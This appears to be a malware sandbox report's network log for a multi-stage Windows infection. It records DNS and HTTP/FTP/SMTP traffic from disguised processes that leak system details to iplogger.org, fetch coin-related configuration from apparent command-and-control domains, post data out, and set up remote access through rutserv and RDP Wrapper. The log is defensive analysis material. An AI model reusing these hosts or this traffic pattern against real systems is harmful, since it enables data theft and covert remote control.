                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            iplogger.org
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            88.99.66.31
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            https://iplogger.org/1B2Cw7
                                                                                                                                                                                                                                                                            utorrent.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            88.99.66.31:443
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /1B2Cw7 HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: UserName: Admin / System: Windows 10 X64 / GPU: SeaBIOS VBE(C) 2011 / RAM: 4 / CPU: Persocon Processor 2.5+, 2 Cores (Session: 80801)
                                                                                                                                                                                                                                                                            Host: iplogger.org
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:57 GMT
                                                                                                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=1t0cj29pni5fg4jvu99a7j1pv4; path=/; HttpOnly
                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                            Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                            Answers:
                                                                                                                                                                                                                                                                            whoami: 59f4dd9a694e2487eb52fdab974df495f688f056de5f54acf0a5e9c72cca29b9
                                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://checkip.amazonaws.com/
                                                                                                                                                                                                                                                                            system.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            52.206.184.85:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET / HTTP/1.1
                                                                                                                                                                                                                                                                            Host: checkip.amazonaws.com
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:40:57 GMT
                                                                                                                                                                                                                                                                            Server: lighttpd/1.4.53
                                                                                                                                                                                                                                                                            Content-Length: 13
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            DNS
                                                                                                                                                                                                                                                                            whois.iana.org
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            8.8.8.8:53
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            whois.iana.org
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            whois.iana.org
                                                                                                                                                                                                                                                                            IN CNAME
                                                                                                                                                                                                                                                                            ianawhois.vip.icann.org
                                                                                                                                                                                                                                                                            ianawhois.vip.icann.org
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            192.0.32.59
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            DNS
                                                                                                                                                                                                                                                                            WHOIS.AFRINIC.NET
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            8.8.8.8:53
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            WHOIS.AFRINIC.NET
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            WHOIS.AFRINIC.NET
                                                                                                                                                                                                                                                                            IN CNAME
                                                                                                                                                                                                                                                                            whois-public.AFRINIC.NET
                                                                                                                                                                                                                                                                            whois-public.AFRINIC.NET
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            196.192.115.21
                                                                                                                                                                                                                                                                            whois-public.AFRINIC.NET
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            196.216.2.20
                                                                                                                                                                                                                                                                            whois-public.AFRINIC.NET
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            196.216.2.21
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            DNS
                                                                                                                                                                                                                                                                            www.geoplugin.net
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            8.8.8.8:53
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            www.geoplugin.net
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            www.geoplugin.net
                                                                                                                                                                                                                                                                            IN CNAME
                                                                                                                                                                                                                                                                            geoplugin.net
                                                                                                                                                                                                                                                                            geoplugin.net
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            178.237.33.50
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://www.geoplugin.net/json.gp?ip=154.61.71.51
                                                                                                                                                                                                                                                                            system.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            178.237.33.50:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /json.gp?ip=154.61.71.51 HTTP/1.1
                                                                                                                                                                                                                                                                            Host: www.geoplugin.net
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:41:34 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                            Content-Length: 930
                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            DNS
                                                                                                                                                                                                                                                                            whois.iana.org
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            8.8.8.8:53
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            whois.iana.org
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            whois.iana.org
                                                                                                                                                                                                                                                                            IN CNAME
                                                                                                                                                                                                                                                                            ianawhois.vip.icann.org
                                                                                                                                                                                                                                                                            ianawhois.vip.icann.org
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            192.0.32.59
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            DNS
                                                                                                                                                                                                                                                                            WHOIS.AFRINIC.NET
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            8.8.8.8:53
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            WHOIS.AFRINIC.NET
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            WHOIS.AFRINIC.NET
                                                                                                                                                                                                                                                                            IN CNAME
                                                                                                                                                                                                                                                                            whois-public.AFRINIC.NET
                                                                                                                                                                                                                                                                            whois-public.AFRINIC.NET
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            196.192.115.21
                                                                                                                                                                                                                                                                            whois-public.AFRINIC.NET
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            196.216.2.20
                                                                                                                                                                                                                                                                            whois-public.AFRINIC.NET
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            196.216.2.21
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            DNS
                                                                                                                                                                                                                                                                            loders.xyz
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            8.8.8.8:53
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            loders.xyz
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            loders.xyz
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            193.109.79.176
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            DNS
                                                                                                                                                                                                                                                                            dashost2.xyz
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            8.8.8.8:53
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            dashost2.xyz
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            dashost2.xyz
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            194.147.78.109
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://dashost2.xyz/randomx/STATUS.html
                                                                                                                                                                                                                                                                            audiodg.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            194.147.78.109:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /randomx/STATUS.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: dashost2.xyz
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:41:14 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Fri, 13 Nov 2020 15:15:41 GMT
                                                                                                                                                                                                                                                                            ETag: "6-5b3fe806f1e18"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 6
                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://dashost2.xyz/LTC.html
                                                                                                                                                                                                                                                                            audiodg.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            194.147.78.109:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /LTC.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: dashost2.xyz
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:41:15 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 22 Sep 2020 20:21:28 GMT
                                                                                                                                                                                                                                                                            ETag: "22-5afecb6476e6e"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 34
                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            DNS
                                                                                                                                                                                                                                                                            wininit.club
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            8.8.8.8:53
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            wininit.club
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            wininit.club
                                                                                                                                                                                                                                                                            IN A
                                                                                                                                                                                                                                                                            109.248.11.138
                                                                                                                                                                                                                                                                          • flag-unknown
                                                                                                                                                                                                                                                                            GET
                                                                                                                                                                                                                                                                            http://wininit.club/d/web.html
                                                                                                                                                                                                                                                                            audiodg.exe
                                                                                                                                                                                                                                                                            Remote address:
                                                                                                                                                                                                                                                                            109.248.11.138:80
                                                                                                                                                                                                                                                                            Request
                                                                                                                                                                                                                                                                            GET /d/web.html HTTP/1.1
                                                                                                                                                                                                                                                                            User-Agent: AutoIt
                                                                                                                                                                                                                                                                            Host: wininit.club
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            Response
                                                                                                                                                                                                                                                                            HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Date: Wed, 18 Nov 2020 13:41:15 GMT
                                                                                                                                                                                                                                                                            Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                            Last-Modified: Tue, 13 Oct 2020 21:00:53 GMT
                                                                                                                                                                                                                                                                            ETag: "e-5b193b5dea71b"
                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                            Content-Length: 14
                                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                                          • 185.175.44.167:5655
                                                                                                                                                                                                                                                                            rms-server.tektonit.ru
                                                                                                                                                                                                                                                                            rutserv.exe
                                                                                                                                                                                                                                                                            1.3kB
                                                                                                                                                                                                                                                                            407 B
                                                                                                                                                                                                                                                                            8
                                                                                                                                                                                                                                                                            7
                                                                                                                                                                                                                                                                          • 208.95.112.1:80
                                                                                                                                                                                                                                                                            http://ip-api.com/json
                                                                                                                                                                                                                                                                            http
                                                                                                                                                                                                                                                                            winit.exe
                                                                                                                                                                                                                                                                            315 B
                                                                                                                                                                                                                                                                            591 B
                                                                                                                                                                                                                                                                            5
                                                                                                                                                                                                                                                                            2

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://ip-api.com/json

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200
                                                                                                                                                                                                                                                                          • 194.0.200.251:465
                                                                                                                                                                                                                                                                            freemail.freehost.com.ua
                                                                                                                                                                                                                                                                            tls, smtps
                                                                                                                                                                                                                                                                            winit.exe
                                                                                                                                                                                                                                                                            4.5kB
                                                                                                                                                                                                                                                                            5.1kB
                                                                                                                                                                                                                                                                            20
                                                                                                                                                                                                                                                                            21
                                                                                                                                                                                                                                                                          • 109.248.11.138:80
                                                                                                                                                                                                                                                                            http://wininit.club/S.html
                                                                                                                                                                                                                                                                            http
                                                                                                                                                                                                                                                                            update.bin.exe
                                                                                                                                                                                                                                                                            849 B
                                                                                                                                                                                                                                                                            1.2kB
                                                                                                                                                                                                                                                                            11
                                                                                                                                                                                                                                                                            7

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://wininit.club/STATUS.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://wininit.club/L.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://wininit.club/P.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://wininit.club/S.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200
                                                                                                                                                                                                                                                                          • 109.248.11.138:80
                                                                                                                                                                                                                                                                            http://wininit.club/S.html
                                                                                                                                                                                                                                                                            http
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            891 B
                                                                                                                                                                                                                                                                            1.2kB
                                                                                                                                                                                                                                                                            12
                                                                                                                                                                                                                                                                            7

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://wininit.club/L2.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://wininit.club/L.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://wininit.club/P.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://wininit.club/S.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200
                                                                                                                                                                                                                                                                          • 185.212.148.107:80
                                                                                                                                                                                                                                                                            http://dashost.club/DOGE.html
                                                                                                                                                                                                                                                                            http
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            3.1kB
                                                                                                                                                                                                                                                                            5.1kB
                                                                                                                                                                                                                                                                            35
                                                                                                                                                                                                                                                                            19

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://dashost.club/ex20mac/STATUS.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://dashost.club/ex20mac/loaderTOP.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            404

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://dashost.club/LTC.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://dashost.club/BTC.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://dashost.club/ETH.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://dashost.club/ZEC.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://dashost.club/DOGE.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://dashost.club/ex20mac/Login.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://dashost.club/ex20mac/Password.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://dashost.club/ex20mac/Server.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://dashost.club/ex20mac/configCPUX.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://dashost.club/LTC.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://dashost.club/BTC.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://dashost.club/ETH.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://dashost.club/ZEC.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://dashost.club/DOGE.html

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200
                                                                                                                                                                                                                                                                          • 45.141.184.35:21
                                                                                                                                                                                                                                                                            ftp
                                                                                                                                                                                                                                                                            update.bin.exe
                                                                                                                                                                                                                                                                            1.3kB
                                                                                                                                                                                                                                                                            1.1kB
                                                                                                                                                                                                                                                                            26
                                                                                                                                                                                                                                                                            16
                                                                                                                                                                                                                                                                          • 45.141.184.35:12080
                                                                                                                                                                                                                                                                            update.bin.exe
                                                                                                                                                                                                                                                                            41.3kB
                                                                                                                                                                                                                                                                            1.3MB
                                                                                                                                                                                                                                                                            898
                                                                                                                                                                                                                                                                            897
                                                                                                                                                                                                                                                                          • 45.141.184.35:12246
                                                                                                                                                                                                                                                                            update.bin.exe
                                                                                                                                                                                                                                                                            512 B
                                                                                                                                                                                                                                                                            39.1kB
                                                                                                                                                                                                                                                                            11
                                                                                                                                                                                                                                                                            27
                                                                                                                                                                                                                                                                          • 45.141.184.35:21
                                                                                                                                                                                                                                                                            ftp
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            1.3kB
                                                                                                                                                                                                                                                                            1.1kB
                                                                                                                                                                                                                                                                            26
                                                                                                                                                                                                                                                                            16
                                                                                                                                                                                                                                                                          • 45.141.184.35:12640
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            604 B
                                                                                                                                                                                                                                                                            45.1kB
                                                                                                                                                                                                                                                                            13
                                                                                                                                                                                                                                                                            31
                                                                                                                                                                                                                                                                          • 45.141.184.35:12214
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            12.2kB
                                                                                                                                                                                                                                                                            394.1kB
                                                                                                                                                                                                                                                                            266
                                                                                                                                                                                                                                                                            265
                                                                                                                                                                                                                                                                          • 185.143.145.9:80
                                                                                                                                                                                                                                                                            http://stcubegames.netxi.in/index.php
                                                                                                                                                                                                                                                                            http
                                                                                                                                                                                                                                                                            azur.exe
                                                                                                                                                                                                                                                                            149.3kB
                                                                                                                                                                                                                                                                            4.6MB
                                                                                                                                                                                                                                                                            3117
                                                                                                                                                                                                                                                                            3113

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            POST http://stcubegames.netxi.in/index.php

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            POST http://stcubegames.netxi.in/index.php

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200
                                                                                                                                                                                                                                                                          • 151.101.0.133:443
                                                                                                                                                                                                                                                                            https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini
                                                                                                                                                                                                                                                                            tls, http
                                                                                                                                                                                                                                                                            RDPWInst.exe
                                                                                                                                                                                                                                                                            5.1kB
                                                                                                                                                                                                                                                                            138.3kB
                                                                                                                                                                                                                                                                            101
                                                                                                                                                                                                                                                                            97

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200
                                                                                                                                                                                                                                                                          • 88.99.66.31:443
                                                                                                                                                                                                                                                                            https://iplogger.org/1qW3y7
                                                                                                                                                                                                                                                                            tls, http
                                                                                                                                                                                                                                                                            update.bin.exe
                                                                                                                                                                                                                                                                            992 B
                                                                                                                                                                                                                                                                            4.4kB
                                                                                                                                                                                                                                                                            10
                                                                                                                                                                                                                                                                            7

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET https://iplogger.org/1qW3y7

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200
                                                                                                                                                                                                                                                                          • 151.101.0.133:443
                                                                                                                                                                                                                                                                            https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini
                                                                                                                                                                                                                                                                            tls, http
                                                                                                                                                                                                                                                                            RDPWInst.exe
                                                                                                                                                                                                                                                                            5.1kB
                                                                                                                                                                                                                                                                            138.3kB
                                                                                                                                                                                                                                                                            101
                                                                                                                                                                                                                                                                            97

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200
                                                                                                                                                                                                                                                                          • 109.248.203.91:21
                                                                                                                                                                                                                                                                            ftp
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            438 B
                                                                                                                                                                                                                                                                            369 B
                                                                                                                                                                                                                                                                            9
                                                                                                                                                                                                                                                                            7
                                                                                                                                                                                                                                                                          • 109.248.11.161:35253
                                                                                                                                                                                                                                                                            http://109.248.11.161:35253/IRemotePanel
                                                                                                                                                                                                                                                                            http
                                                                                                                                                                                                                                                                            system.exe
                                                                                                                                                                                                                                                                            3.5MB
                                                                                                                                                                                                                                                                            19.9kB
                                                                                                                                                                                                                                                                            2350
                                                                                                                                                                                                                                                                            449

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            POST http://109.248.11.161:35253/IRemotePanel

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            POST http://109.248.11.161:35253/IRemotePanel

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            POST http://109.248.11.161:35253/IRemotePanel

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200
                                                                                                                                                                                                                                                                          • 109.248.203.91:21
                                                                                                                                                                                                                                                                            ftp
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            438 B
                                                                                                                                                                                                                                                                            329 B
                                                                                                                                                                                                                                                                            9
                                                                                                                                                                                                                                                                            6
                                                                                                                                                                                                                                                                          • 104.26.12.31:443
                                                                                                                                                                                                                                                                            https://api.ip.sb/geoip
                                                                                                                                                                                                                                                                            tls, http
                                                                                                                                                                                                                                                                            system.exe
                                                                                                                                                                                                                                                                            707 B
                                                                                                                                                                                                                                                                            4.3kB
                                                                                                                                                                                                                                                                            8
                                                                                                                                                                                                                                                                            8

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET https://api.ip.sb/geoip

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200
                                                                                                                                                                                                                                                                          • 88.99.66.31:443
                                                                                                                                                                                                                                                                            https://iplogger.org/1B2Cw7
                                                                                                                                                                                                                                                                            tls, http
                                                                                                                                                                                                                                                                            utorrent.exe
                                                                                                                                                                                                                                                                            1.0kB
                                                                                                                                                                                                                                                                            4.4kB
                                                                                                                                                                                                                                                                            11
                                                                                                                                                                                                                                                                            7

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET https://iplogger.org/1B2Cw7

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200
                                                                                                                                                                                                                                                                          • 52.206.184.85:80
                                                                                                                                                                                                                                                                            http://checkip.amazonaws.com/
                                                                                                                                                                                                                                                                            http
                                                                                                                                                                                                                                                                            system.exe
                                                                                                                                                                                                                                                                            301 B
                                                                                                                                                                                                                                                                            262 B
                                                                                                                                                                                                                                                                            5
                                                                                                                                                                                                                                                                            3

                                                                                                                                                                                                                                                                            HTTP Request

                                                                                                                                                                                                                                                                            GET http://checkip.amazonaws.com/

                                                                                                                                                                                                                                                                            HTTP Response

                                                                                                                                                                                                                                                                            200
                                                                                                                                                                                                                                                                          • 109.248.203.91:21
                                                                                                                                                                                                                                                                            ftp
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            1.3kB
                                                                                                                                                                                                                                                                            1.1kB
                                                                                                                                                                                                                                                                            27
                                                                                                                                                                                                                                                                            15
                                                                                                                                                                                                                                                                          • 192.0.32.59:43
                                                                                                                                                                                                                                                                            whois.iana.org
                                                                                                                                                                                                                                                                            system.exe
                                                                                                                                                                                                                                                                            244 B
                                                                                                                                                                                                                                                                            492 B
                                                                                                                                                                                                                                                                            5
                                                                                                                                                                                                                                                                            4
                                                                                                                                                                                                                                                                          • 109.248.203.91:62675
                                                                                                                                                                                                                                                                            taskhost.exe
                                                                                                                                                                                                                                                                            604 B
                                                                                                                                                                                                                                                                            45.1kB
                                                                                                                                                                                                                                                                            13
                                                                                                                                                                                                                                                                            31
                                                                                                                                                                                                                                                                          • 196.192.115.21:43
                                                                                                                                                                                                                                                                            WHOIS.AFRINIC.NET
                                                                                                                                                                                                                                                                            system.exe
                                                                                                                                                                                                                                                                            336 B
                                                                                                                                                                                                                                                                            2.6kB
                                                                                                                                                                                                                                                                            7
                                                                                                                                                                                                                                                                            6
